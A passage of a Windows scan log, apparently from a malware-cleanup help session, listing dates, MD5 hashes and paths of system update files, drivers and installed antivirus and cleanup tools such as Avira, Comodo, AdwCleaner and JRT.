2014-10-24 07:03:22   1200D9C7DB0ADC1B8143A0A9921BF7DA   127488   ----a-w-   C:\Windows\SysWOW64\occache.dll
2014-10-24 07:03:22   03B3541AE6986602CF9CB5B3AD169C33   208384   ----a-w-   C:\Windows\SysWOW64\webcheck.dll
2014-10-24 06:56:29   8999F18D38D55E34D356796507FFD639   192000   ----a-w-   C:\Windows\SysWOW64\rdpendp_winip.dll
2014-10-16 16:12:05   D5D5BBF6AA45D820BAA0BD1303B8AAF6   81560   ----a-w-   C:\Windows\SysWOW64\mscories.dll
2014-10-16 16:12:05   A139A5E6B34F136405B030EA04595A20   156824   ----a-w-   C:\Windows\SysWOW64\mscorier.dll
2014-10-16 16:12:05   8580484193CE0A0788830FBAB97CF13B   1131664   ----a-w-   C:\Windows\SysWOW64\dfshim.dll
2014-10-16 16:11:46   3888D02CE6413C2A06D903DE1C778BF5   2363904   ----a-w-   C:\Windows\SysWOW64\msi.dll
2014-10-16 16:11:38   37C395C075E6FA66623C82DE50A8FAED   372736   ----a-w-   C:\Windows\SysWOW64\rastls.dll
2014-10-16 16:11:35   FD67683FBA9B2C4BB551780BD8846F64   157696   ----a-w-   C:\Windows\SysWOW64\winsta.dll
2014-10-16 16:11:35   DB1D6751689B4A7EE2439C64F2ADF1C9   17408   ----a-w-   C:\Windows\SysWOW64\credssp.dll
2014-10-16 16:11:35   13829161C1297F4170A5546430147BBD   65536   ----a-w-   C:\Windows\SysWOW64\TSpkg.dll
2014-10-16 16:11:23   C120855C1133DF8FFD5E0C04A7E70B67   67072   ----a-w-   C:\Windows\SysWOW64\packager.dll
====== C:\Windows\SysWOW64\drivers =====
====== C:\Windows\Sysnative =====
2014-10-24 11:06:06   15847E14811FEDDF77E934AF4F0BEF45   940032   ----a-w-   C:\Windows\Sysnative\MsSpellCheckingFacility.exe
2014-10-24 10:48:54   E9CB5F138943D383DB67F29AAB60453F   3179520   ----a-w-   C:\Windows\Sysnative\rdpcorets.dll
2014-10-24 10:48:54   2147C5330F983D76A36B73F4A804F778   16384   ----a-w-   C:\Windows\Sysnative\RdpGroupPolicyExtension.dll
2014-10-24 10:42:36   6DD73E4E947DB3B0608321AE13210D94   6584320   ----a-w-   C:\Windows\Sysnative\mstscax.dll
2014-10-24 07:06:14   DDED7C5558B3AE09F568945281A9A6D1   44544   ----a-w-   C:\Windows\Sysnative\TsUsbGDCoInstaller.dll
2014-10-24 07:06:07   FEC6178962DFF33074D39CA907971405   12800   ----a-w-   C:\Windows\Sysnative\TsUsbRedirectionGroupPolicyExtension.dll
2014-10-24 07:06:07   108C257D765AAD2E6EC46557DA0B02BD   13824   ----a-w-   C:\Windows\Sysnative\TsUsbRedirectionGroupPolicyControl.exe
2014-10-24 07:06:06   8E75B1112C374EBDF18FD640DA2F0655   1147392   ----a-w-   C:\Windows\Sysnative\mstsc.exe
2014-10-24 07:06:06   7BD2E6E2458A5B95F8341244C7FC7DD4   18944   ----a-w-   C:\Windows\Sysnative\wksprtPS.dll
2014-10-24 07:06:06   79EE5ECB4BE89343E4CF1E48F7769F59   420864   ----a-w-   C:\Windows\Sysnative\wksprt.exe
2014-10-24 07:06:06   5289A00E2D21BB3A7D6761646543ED5C   62976   ----a-w-   C:\Windows\Sysnative\tsgqec.dll
2014-10-24 07:06:06   149A388C17F04AD1F99B477A43BE1A9F   56832   ----a-w-   C:\Windows\Sysnative\MsRdpWebAccess.dll
2014-10-24 07:06:06   0D2C2FAC4F29B5868D39B7267058CFEF   83968   ----a-w-   C:\Windows\Sysnative\TSWbPrxy.exe
2014-10-24 07:06:05   A4420969E5AB94856E5C0C02E6099D3F   1057280   ----a-w-   C:\Windows\Sysnative\rdvidcrl.dll
2014-10-24 07:03:22   EB710A3AF29BEC4EE7475A1ED5C575DE   195584   ----a-w-   C:\Windows\Sysnative\msrating.dll
2014-10-24 07:03:22   BE37AA454460539877420951EEA16EF0   51200   ----a-w-   C:\Windows\Sysnative\jsproxy.dll
2014-10-24 07:03:22   9D98D4F390F0B14A782F3B931E613A1A   2309632   ----a-w-   C:\Windows\Sysnative\wininet.dll
2014-10-24 07:03:22   8F7FBD0177F79727CF945ABDA657A0AC   235008   ----a-w-   C:\Windows\Sysnative\elshyph.dll
2014-10-24 07:03:22   6F1AF8E1206E92256459E3012C20472A   942592   ----a-w-   C:\Windows\Sysnative\jsIntl.dll
2014-10-24 07:03:22   4399857346DD183683332921500046B1   86016   ----a-w-   C:\Windows\Sysnative\RegisterIEPKEYs.exe
2014-10-24 07:03:22   2EBD0C5B090125AECF017C57344C45AB   247808   ----a-w-   C:\Windows\Sysnative\msls31.dll
2014-10-24 07:03:22   0F5A279522FA6A30C9C5A297A1064933   1447936   ----a-w-   C:\Windows\Sysnative\urlmon.dll
2014-10-24 07:03:22   050FD78BA4EFA62417F61F4C098B5B25   2796032   ----a-w-   C:\Windows\Sysnative\iertutil.dll
2014-10-24 07:03:21   FD61D51199F3FC9EB0023FBF405EAAD0   147968   ----a-w-   C:\Windows\Sysnative\occache.dll
2014-10-24 07:03:21   F9FA80C1CB6EAC55A7F534937F6AC4E4   139264   ----a-w-   C:\Windows\Sysnative\ieUnatt.exe
2014-10-24 07:03:21   F862CD08F1AD4EE39BD506853F3C6103   16284   ----a-w-   C:\Windows\Sysnative\ieuinit.inf
2014-10-24 07:03:21   F00AE7B953ABEF1B53FBBA187DFC8238   243200   ----a-w-   C:\Windows\Sysnative\webcheck.dll
2014-10-24 07:03:21   E9109E91BB8366759822DC2FC9B5DA8B   111616   ----a-w-   C:\Windows\Sysnative\ieetwcollector.exe
2014-10-24 07:03:21   E70D4270C43CE6C46841B684315B9EFF   62464   ----a-w-   C:\Windows\Sysnative\pngfilt.dll
2014-10-24 07:03:21   E4A6577D74B2439974C8018AB5F1BFEA   13312   ----a-w-   C:\Windows\Sysnative\msfeedssync.exe
2014-10-24 07:03:21   DD8E9C85F9F428859713055183661956   48640   ----a-w-   C:\Windows\Sysnative\ieetwproxystub.dll
2014-10-24 07:03:21   DB101A62F9BF8E7765685950169EF52B   758272   ----a-w-   C:\Windows\Sysnative\jscript9diag.dll
2014-10-24 07:03:21   DAF317E9F4CEC206D0D443014A427341   446464   ----a-w-   C:\Windows\Sysnative\dxtmsft.dll
2014-10-24 07:03:21   D3B07C2FABEAE749E4E51F1E93CABA23   5829632   ----a-w-   C:\Windows\Sysnative\jscript9.dll
2014-10-24 07:03:21   D31AE751B6DACAFD0D7CC99EAE9606C2   131072   ----a-w-   C:\Windows\Sysnative\IEAdvpack.dll
2014-10-24 07:03:21   CE8831D2DCB5803A4CBC8EDCCBBC2A05   77312   ----a-w-   C:\Windows\Sysnative\tdc.ocx
2014-10-24 07:03:21   C92173481A58935BE15172079CF122B8   235520   ----a-w-   C:\Windows\Sysnative\url.dll
2014-10-24 07:03:21   C17139EAF939964142C7A1AEEE02DC81   616104   ----a-w-   C:\Windows\Sysnative\ieapfltr.dat
2014-10-24 07:03:21   C109D5136DF0A6CA668C7AD888AA125F   2724864   ----a-w-   C:\Windows\Sysnative\mshtml.tlb
2014-10-24 07:03:21   BB6DEAFAC5F0AAEC37FEAF3F3AA48347   774144   ----a-w-   C:\Windows\Sysnative\jscript.dll
2014-10-24 07:03:21   B07E9AFF50DC007E7D5AC54736AA5A25   4096   ----a-w-   C:\Windows\Sysnative\ieetwcollectorres.dll
2014-10-24 07:03:21   ADA5C3D49A12CED9F07913DC00E547A8   48128   ----a-w-   C:\Windows\Sysnative\imgutil.dll
2014-10-24 07:03:21   A2105E46DC9CE38A1D57FB124436E1BC   85504   ----a-w-   C:\Windows\Sysnative\mshtmled.dll
2014-10-24 07:03:21   98241BE7EB26C41562D33393DD12608F   289280   ----a-w-   C:\Windows\Sysnative\dxtrans.dll
2014-10-24 07:03:21   9675B272086CF5D22B83B541FAA8D4EA   30208   ----a-w-   C:\Windows\Sysnative\licmgr10.dll
2014-10-24 07:03:21   95828D670CFD3B16EE188168E083C3C5   13824   ----a-w-   C:\Windows\Sysnative\mshta.exe
2014-10-24 07:03:21   88D2165E07CEDC3F34CBE1A5A807673D   595968   ----a-w-   C:\Windows\Sysnative\ieui.dll
2014-10-24 07:03:21   87D14AF9A2C3F3D5233B613CFA9C321D   378552   ----a-w-   C:\Windows\Sysnative\iedkcs32.dll
2014-10-24 07:03:21   7E60EE8A68F7270D1E1662CBA275D4FA   13619200   ----a-w-   C:\Windows\Sysnative\ieframe.dll
2014-10-24 07:03:21   7415B29AFE2E4494A57358B8C7E78600   23631360   ----a-w-   C:\Windows\Sysnative\mshtml.dll
2014-10-24 07:03:21   739D9C9F220CCEDAFD8212C6B976B60D   33792   ----a-w-   C:\Windows\Sysnative\iernonce.dll
2014-10-24 07:03:21   70527367E5779C3537992F0768D9C59A   1249280   ----a-w-   C:\Windows\Sysnative\mshtmlmedia.dll
2014-10-24 07:03:21   646C004F58AA4762F92BF7C595216C37   2108416   ----a-w-   C:\Windows\Sysnative\inetcpl.cpl
2014-10-24 07:03:21   5BBDBE5EBB49EA7C76A2EE7490A45D68   101376   ----a-w-   C:\Windows\Sysnative\inseng.dll
2014-10-24 07:03:21   5141B67F14E2B6CBB6ADF851ABE364A5   90112   ----a-w-   C:\Windows\Sysnative\SetIEInstalledDate.exe
2014-10-24 07:03:21   4D21F4FDF57DF86FAD9149ED1C071D15   72704   ----a-w-   C:\Windows\Sysnative\JavaScriptCollectionAgent.dll
2014-10-24 07:03:21   46FD16F9B1924A2EA8CD5C6716CC654F   167424   ----a-w-   C:\Windows\Sysnative\iexpress.exe
2014-10-24 07:03:21   45B736E3184B68515FDB71D4083A9BCF   731136   ----a-w-   C:\Windows\Sysnative\msfeeds.dll
2014-10-24 07:03:21   3A4FD19F13F8809BA08E9F76C0E38832   413696   ----a-w-   C:\Windows\Sysnative\html.iec
2014-10-24 07:03:21   328143D6BC5951E1797BD524C4E98CDC   547328   ----a-w-   C:\Windows\Sysnative\vbscript.dll
2014-10-24 07:03:21   30FB9ABB6C45C3299CFA5F556904DD5F   83968   ----a-w-   C:\Windows\Sysnative\MshtmlDac.dll
2014-10-24 07:03:21   2E5AF1507CBE735B4D7EBFF1908EA0E1   775168   ----a-w-   C:\Windows\Sysnative\ieapfltr.dll
2014-10-24 07:03:21   29C0530E0F120AC3E583889DCD6A63DD   710656   ----a-w-   C:\Windows\Sysnative\ie4uinit.exe
2014-10-24 07:03:21   2405D24AA28CCC4CC7E0CC0AE008746F   48640   ----a-w-   C:\Windows\Sysnative\mshtmler.dll
2014-10-24 07:03:21   1FCBE949A67939ADEAE7279E423AA684   135680   ----a-w-   C:\Windows\Sysnative\iepeers.dll
2014-10-24 07:03:21   1EA6500C25A80E8BDB65099C509AF993   143872   ----a-w-   C:\Windows\Sysnative\wextract.exe
2014-10-24 07:03:21   0FBEBD36FEFFEE5AF25FDAEE5E35EE99   105984   ----a-w-   C:\Windows\Sysnative\iesysprep.dll
2014-10-24 07:03:21   0A9D5716CB1F3AFA73703F39647BB8C2   81408   ----a-w-   C:\Windows\Sysnative\icardie.dll
2014-10-24 07:03:21   0467A4DDA6B2CE8E27A8178BF035BA18   66048   ----a-w-   C:\Windows\Sysnative\iesetup.dll
2014-10-24 07:03:21   038ABC9BCC86DFF9E181D44E43E2CEBA   52224   ----a-w-   C:\Windows\Sysnative\msfeedsbs.dll
2014-10-24 06:56:29   D346E07D62E3D4BEAB040939744EC31B   228864   ----a-w-   C:\Windows\Sysnative\rdpendp_winip.dll
2014-10-24 06:56:29   AD4D0AEDB5993EDA31EB80A54EDBC344   243200   ----a-w-   C:\Windows\Sysnative\rdpudd.dll
2014-10-16 16:12:08   5602D4C331FD7938ADE06D9242138922   3198976   ----a-w-   C:\Windows\Sysnative\win32k.sys
2014-10-16 16:12:05   50EC828370CB5F5E9FF08B10F1B701C8   73880   ----a-w-   C:\Windows\Sysnative\mscories.dll
2014-10-16 16:12:05   5083CC5456FE8A5D21ECF9E32ACC779F   1943696   ----a-w-   C:\Windows\Sysnative\dfshim.dll
2014-10-16 16:12:05   2D6C77A3DB3D8EE00FB55834A67E4073   156312   ----a-w-   C:\Windows\Sysnative\mscorier.dll
2014-10-16 16:11:46   ADD3F2C3E6B89BD16D4BFC61B3658DD9   3241472   ----a-w-   C:\Windows\Sysnative\msi.dll
2014-10-16 16:11:38   DD7C31F12936795C0516BB6C59CBCCD8   424448   ----a-w-   C:\Windows\Sysnative\rastls.dll
2014-10-16 16:11:36   4FC4C50985E5B840F4D72E57286887B8   681984   ----a-w-   C:\Windows\Sysnative\termsrv.dll
2014-10-16 16:11:35   C23B6D9D16FD86F446BE607CA18389D9   235520   ----a-w-   C:\Windows\Sysnative\winsta.dll
2014-10-16 16:11:35   85E03B6E05939845BC924C91AEDE0E24   86528   ----a-w-   C:\Windows\Sysnative\TSpkg.dll
2014-10-16 16:11:35   560CF90C026C0FE51CC6820302FF94FE   22016   ----a-w-   C:\Windows\Sysnative\credssp.dll
2014-10-16 16:11:35   0374D83D003043E7DE33036294A2EFAE   150528   ----a-w-   C:\Windows\Sysnative\rdpcorekmts.dll
2014-10-16 16:11:23   1DB68B8A1E3BDE3C19F1D3612CE436CA   77312   ----a-w-   C:\Windows\Sysnative\packager.dll
====== C:\Windows\Sysnative\drivers =====
2014-10-27 14:08:56   F627BFFCC52587350E49FC2C2A03C7F9   43064   ----a-w-   C:\Windows\Sysnative\drivers\avnetflt.sys
2014-10-27 14:06:34   AF61774060F277FE45CBD3A9A8E7D45A   131608   ----a-w-   C:\Windows\Sysnative\drivers\avipbb.sys
2014-10-27 14:06:34   390184FAD8FCC1B6DA25AEBAE928C3B6   28600   ----a-w-   C:\Windows\Sysnative\drivers\avkmgr.sys
2014-10-27 14:06:34   1B87A1F2FA5B91AC1A7D171B8D952441   119272   ----a-w-   C:\Windows\Sysnative\drivers\avgntflt.sys
2014-10-24 07:06:07   E9981ECE8D894CEF7038FD1D040EB426   56832   ----a-w-   C:\Windows\Sysnative\drivers\TsUsbFlt.sys
2014-10-24 06:56:33   313F68E1A3E6345A4F47A36B07062F34   19456   ----a-w-   C:\Windows\Sysnative\drivers\rdpvideominiport.sys
2014-10-19 19:12:34   26C43960C99EE861A5D0EDC4DCF3B1C3   129752   ----a-w-   C:\Windows\Sysnative\drivers\MBAMSwissArmy.sys
2014-10-19 19:11:05   95EF63A7827D4E3A229CBBCB42619E93   63704   ----a-w-   C:\Windows\Sysnative\drivers\mwac.sys
2014-10-19 19:11:05   5C3669B71657F22E67A1D4BD49D2CBE7   25816   ----a-w-   C:\Windows\Sysnative\drivers\mbam.sys
2014-10-19 19:11:05   1A243DAD23BB639D47F25AB9EC51FCAD   92888   ----a-w-   C:\Windows\Sysnative\drivers\mbamchameleon.sys
2014-10-16 16:11:35   FE571E088C2D83619D2D48D4E961BF41   212480   ----a-w-   C:\Windows\Sysnative\drivers\rdpwd.sys
2014-10-16 16:11:35   E232A3B43A894BB327FC161529BD9ED1   39936   ----a-w-   C:\Windows\Sysnative\drivers\tssecsrv.sys
====== C:\Windows\Tasks ======
====== C:\Windows\Temp ======
======= C:\Program Files =====
2014-10-25 08:45:58   --------   d-----w-   C:\Program Files\COMODO
2014-10-24 06:52:57   --------   d-----w-   C:\Program Files\Microsoft Silverlight
2014-10-04 20:45:30   --------   d-----w-   C:\Program Files\CDisplayEx
======= C:\PROGRA~2 =====
2014-10-27 14:05:32   --------   d-----w-   C:\PROGRA~2\Avira
2014-10-25 08:45:07   --------   d-----w-   C:\PROGRA~2\Comodo
2014-10-24 06:52:57   --------   d-----w-   C:\PROGRA~2\Microsoft Silverlight
======= C: =====
====== C:\Users\McLain\AppData\Roaming ======
2014-10-27 14:08:47   --------   d-----w-   C:\Users\McLain\AppData\Roaming\Avira
2014-10-27 14:07:50   --------   d-----w-   C:\Windows\sysWoW64\config\systemprofile\AppData\Roaming\Avira
2014-10-27 14:06:19   --------   d-----w-   C:\Windows\sysWoW64\config\systemprofile\AppData\Local\AviraSpeedup
2014-10-27 14:02:58   --------   d-----w-   C:\Users\Public\AppData\Local\temp
2014-10-27 14:02:58   --------   d-----w-   C:\Users\Default\AppData\Local\temp
2014-10-27 14:02:58   --------   d-----w-   C:\Users\Default User\AppData\Local\temp
2014-10-25 08:48:10   --------   d-----w-   C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Comodo
2014-10-25 08:46:42   --------   d-----w-   C:\Windows\sysWoW64\config\systemprofile\AppData\Locallow\COMODO
2014-10-04 20:45:36   --------   d-----w-   C:\Users\McLain\AppData\Roaming\CDisplayEx
====== C:\Users\McLain ======
2014-10-27 21:34:49   FF33D8CDF04B1D15F3808D49406BEA43   1998336   ----a-w-   C:\Users\McLain\Desktop\AdwCleaner.exe
2014-10-27 21:34:21   27A4F18F1BB9F05D71128BADD4DCD5C3   1706144   ----a-w-   C:\Users\McLain\Desktop\JRT.exe
2014-10-27 14:05:33   --------   d-----w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2014-10-27 14:05:32   --------   d-----w-   C:\ProgramData\Avira
2014-10-27 14:05:13   A3EF50C9504E3DAF3C570F9062C73FDC   4585472   ----a-w-   C:\Users\McLain\Downloads\avira_en_av___ws.exe
2014-10-27 09:04:32   BAFACB77283652A37AB670C7151C9B3A   2113024   ----a-w-   C:\Users\McLain\Desktop\FRST64.exe
2014-10-27 05:39:58   --------   d-----w-   C:\ProgramData\CheckPoint
2014-10-25 08:53:35   --------   d-----w-   C:\ProgramData\Licenses
2014-10-25 08:45:27   --------   d-----w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Comodo
2014-10-25 08:42:52   --------   d-----w-   C:\ProgramData\Comodo
2014-10-24 06:55:24   --------   d-----w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-10-21 07:14:46   --------   d-----w-   C:\Users\Public\AppData
2014-10-19 08:07:40   --------   d-----w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-10-04 20:45:31   --------   d-----w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CDisplayEx

====== C: exe-files ==
2014-10-27 21:36:08   2E0323A94915FAAB10A25F3BABF82584   157696   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\erunt\ERUNT.EXE
2014-10-27 21:34:49   FF33D8CDF04B1D15F3808D49406BEA43   1998336   ----a-w-   C:\Users\McLain\Desktop\AdwCleaner.exe
2014-10-27 21:34:21   27A4F18F1BB9F05D71128BADD4DCD5C3   1706144   ----a-w-   C:\Users\McLain\Desktop\JRT.exe
2014-10-27 14:06:41   09277E826B0367A0C1E1CA6A62229AE9   494328   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\wsctool.exe
2014-10-27 14:06:37   B2AA6BBD6889F6D0FF2BC3DBB20191EC   394032   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\updrgui.exe
2014-10-27 14:06:37   590A2E799307D5956564D102CBF83088   1063728   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\update.exe
2014-10-27 14:06:36   FE9F6E49159F2B45E0FEC20F860FC3CC   1834288   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\setup.exe
2014-10-27 14:06:36   FCFCD84A3F84375CF2EADA10650C3289   431920   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
2014-10-27 14:06:36   49768CB9D03114C9B0838CD184B818E7   485112   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\licmgr.exe
2014-10-27 14:06:36   066DC0E9DA8ABFB38AC9940DAD74142E   419064   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\setuppending.exe
2014-10-27 14:06:35   D137DBF23D975016FFE322544EA25569   880376   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\fact.exe
2014-10-27 14:06:35   B0DD12938D0F2FFCFF81991F49F5A1C9   658736   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\guardgui.exe
2014-10-27 14:06:35   9040C43001E664A7008A080D993989BC   451888   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\ipmgui.exe
2014-10-27 14:06:35   6876A993D9710A16368C07DC2E6EDC0C   401200   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\checkt.exe
2014-10-27 14:06:35   23926D27C362393443D07AA7CC454E8A   488240   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\inssda64.exe
2014-10-27 14:06:34   FCFCD84A3F84375CF2EADA10650C3289   431920   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
2014-10-27 14:06:34   F1294E1F9F87FBCC74A885786BE2E9B4   547576   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avrestart.exe
2014-10-27 14:06:34   E93FC828AFFAB5E79485C016DFFFDCF1   1043152   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avwsc.exe
2014-10-27 14:06:34   E640A178BA85DF20D433F2DF1C6FC0DD   1014576   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avscan.exe
2014-10-27 14:06:34   DAA21DC0AA2E688370D356757892816D   703736   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
2014-10-27 14:06:34   D62CB48F2FA06D7A243928F2D09470D7   994552   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avwebgrd.exe
2014-10-27 14:06:34   B870A0931F0A29FC7ED67C151EFF5B90   4763416   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avira_en____fm.exe
2014-10-27 14:06:34   B0BC20ADD485E48DDFC613941CBBCFD0   994096   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe
2014-10-27 14:06:34   AE5F4AE5BD362B5BFE18B9F635CDD6C9   702712   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avnotify.exe
2014-10-27 14:06:34   87A29C9801987DD6C6B25061B9F179DC   410360   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avupgsvc.exe
2014-10-27 14:06:34   4879026294748782074EE3AD12F72B35   465200   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\ccuac.exe
2014-10-27 14:06:34   40C23846D6E4E300559A0CA79AAC78C3   417072   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avadmin.exe
2014-10-27 14:06:34   2B4949F788C03B2DC92DCE3B1A280B8F   624432   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avshadow.exe
2014-10-27 14:06:34   25EA4BE5DB5CF97B59838D81F4EB76CB   819504   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avconfig.exe
2014-10-27 14:06:34   17466E1860F53BF0405D6CAAF25002F5   703280   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avcenter.exe
2014-10-27 14:06:34   0454B4FE6D019E808A5292BBC27A057A   496432   ----a-w-   C:\Program Files (x86)\Avira\AntiVir Desktop\avwebloader.exe
2014-10-27 14:05:47   129E0246875D325F5EED90BF6D034144   149971472   ----a-w-   C:\ProgramData\Avira\My Avira\Temp\antivirus.exe
2014-10-27 14:05:13   A3EF50C9504E3DAF3C570F9062C73FDC   4585472   ----a-w-   C:\Users\McLain\Downloads\avira_en_av___ws.exe
2014-10-27 09:04:32   BAFACB77283652A37AB670C7151C9B3A   2113024   ----a-w-   C:\Users\McLain\Desktop\FRST64.exe
2014-10-27 07:57:42   EC87C870FC286178E461C1D917567DCE   41081424   ----a-w-   C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\38.0.2125.104\38.0.2125.104_chrome_installer.exe
2014-10-24 11:06:06   15847E14811FEDDF77E934AF4F0BEF45   940032   ----a-w-   C:\Windows\System32\MsSpellCheckingFacility.exe
2014-10-24 07:06:07   108C257D765AAD2E6EC46557DA0B02BD   13824   ----a-w-   C:\Windows\System32\TsUsbRedirectionGroupPolicyControl.exe
2014-10-24 07:06:06   8E75B1112C374EBDF18FD640DA2F0655   1147392   ----a-w-   C:\Windows\System32\mstsc.exe
2014-10-24 07:06:06   79EE5ECB4BE89343E4CF1E48F7769F59   420864   ----a-w-   C:\Windows\System32\wksprt.exe
2014-10-24 07:06:06   4676AAA9DDF52A50C829FEDB4EA81E54   1068544   ----a-w-   C:\Windows\SysWOW64\mstsc.exe
2014-10-24 07:06:06   0D2C2FAC4F29B5868D39B7267058CFEF   83968   ----a-w-   C:\Windows\System32\TSWbPrxy.exe
2014-10-24 07:03:22   F9F310F9FB7F294F00ABDD03453D8CEE   812736   ----a-w-   C:\Program Files (x86)\Internet Explorer\iexplore.exe
2014-10-24 07:03:22   C1A6E565B2782C09BC40AD749B46D9ED   71680   ----a-w-   C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-24 07:03:22   ABDFC692D9FE43E2BA8FE6CB5A8CB95A   13312   ----a-w-   C:\Windows\SysWOW64\mshta.exe
2014-10-24 07:03:22   AA103FEAD721863B86A1B1260948E662   112128   ----a-w-   C:\Windows\SysWOW64\ieUnatt.exe
2014-10-24 07:03:22   9A33FDDD687A836A1FD478B43C5A95FD   151552   ----a-w-   C:\Windows\SysWOW64\iexpress.exe
2014-10-24 07:03:22   887055A3C8DD6C87D200D11EAFDBD45B   74240   ----a-w-   C:\Windows\SysWOW64\SetIEInstalledDate.exe
2014-10-24 07:03:22   7F7F391491C315A4A72EFCAC0D34FA93   25600   ----a-w-   C:\Program Files (x86)\Internet Explorer\ExtExport.exe
2014-10-24 07:03:22   6B9FDB34A5A490FF6A7EDE280062626A   810680   ----a-w-   C:\Program Files\Internet Explorer\iexplore.exe
2014-10-24 07:03:22   6A92CEC8532056791C6832B2725D170D   139264   ----a-w-   C:\Windows\SysWOW64\wextract.exe
2014-10-24 07:03:22   54C9747BB0A64F4D9D401E4648363386   222720   ----a-w-   C:\Program Files (x86)\Internet Explorer\ielowutil.exe
2014-10-24 07:03:22   53FC62C51CB18C9100A7DFAF2D2A6C47   12800   ----a-w-   C:\Windows\SysWOW64\msfeedssync.exe
2014-10-24 07:03:22   53E24F2DB97EFAF85FE093AA254790EC   470528   ----a-w-   C:\Program Files (x86)\Internet Explorer\ieinstal.exe
2014-10-24 07:03:22   4399857346DD183683332921500046B1   86016   ----a-w-   C:\Windows\System32\RegisterIEPKEYs.exe
2014-10-24 07:03:21   F9FA80C1CB6EAC55A7F534937F6AC4E4   139264   ----a-w-   C:\Windows\System32\ieUnatt.exe
2014-10-24 07:03:21   E9109E91BB8366759822DC2FC9B5DA8B   111616   ----a-w-   C:\Windows\System32\ieetwcollector.exe
2014-10-24 07:03:21   E4A6577D74B2439974C8018AB5F1BFEA   13312   ----a-w-   C:\Windows\System32\msfeedssync.exe
2014-10-24 07:03:21   C876F8303AA30481A36FE2AACDE77671   483840   ----a-w-   C:\Program Files\Internet Explorer\ieinstal.exe
2014-10-24 07:03:21   95828D670CFD3B16EE188168E083C3C5   13824   ----a-w-   C:\Windows\System32\mshta.exe
2014-10-24 07:03:21   649E8F572EC0D929F4EED13A53AC0475   222720   ----a-w-   C:\Program Files\Internet Explorer\ielowutil.exe
2014-10-24 07:03:21   5141B67F14E2B6CBB6ADF851ABE364A5   90112   ----a-w-   C:\Windows\System32\SetIEInstalledDate.exe
2014-10-24 07:03:21   46FD16F9B1924A2EA8CD5C6716CC654F   167424   ----a-w-   C:\Windows\System32\iexpress.exe
2014-10-24 07:03:21   41F922D6A794C0F8425C8436D7077C84   359632   ----a-w-   C:\Program Files\Internet Explorer\iediagcmd.exe
2014-10-24 07:03:21   29C0530E0F120AC3E583889DCD6A63DD   710656   ----a-w-   C:\Windows\System32\ie4uinit.exe
2014-10-24 07:03:21   1EA6500C25A80E8BDB65099C509AF993   143872   ----a-w-   C:\Windows\System32\wextract.exe
2014-10-21 05:25:37   F042EE4C8D66248D9B86DCF52ABAE416   256000   ----a-w-   C:\Windows\PEV.exe
2014-10-21 05:25:37   9E05A9C264C8A908A8E79450FCBFF047   80412   ----a-w-   C:\Windows\grep.exe
2014-10-21 05:25:37   5E832F4FAF5F481F2EAF3B3A48F603B8   68096   ----a-w-   C:\Windows\zip.exe
2014-10-21 05:25:37   0297C72529807322B152F517FDB0A9FC   406528   ----a-w-   C:\Windows\SWSC.exe
2014-10-21 05:25:37   0277C027A26428DB64EF4F64F52BB4FD   208896   ----a-w-   C:\Windows\MBR.exe
=== C: other files ==
2014-10-27 21:36:08   F56A319979F631C141F5FF02DF87FDB1   43563   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\prelim.bat
2014-10-27 21:36:08   DD1E4D974B1672ABD09EFFB225791C4A   1230   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\TDL4.bat
2014-10-27 21:36:08   AD2F52DC72B10AF331692E4A4DD80DFC   18670   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\medfos.bat
2014-10-27 21:36:08   AA0C656F898523BEDF2DA6923197BB80   1264   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\surfvox.bat
2014-10-27 21:36:08   8E6020C14F982CF11B3FE7DBB0CB8EDE   24738   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\searchlnk.bat
2014-10-27 21:36:08   86707BCE5CBB65D9B1C41E249B4423BA   152733   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\firefox.bat
2014-10-27 21:36:08   83F691D8398F0E37E71E9355BF730DB9   719   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\ev_clear.bat
2014-10-27 21:36:08   7F7A362CC9FBF3AD1D1E7C37DD825C0F   14957   ----a-w-   C:\Users\McLain\AppData\Local\Temp\jrt\get.bat
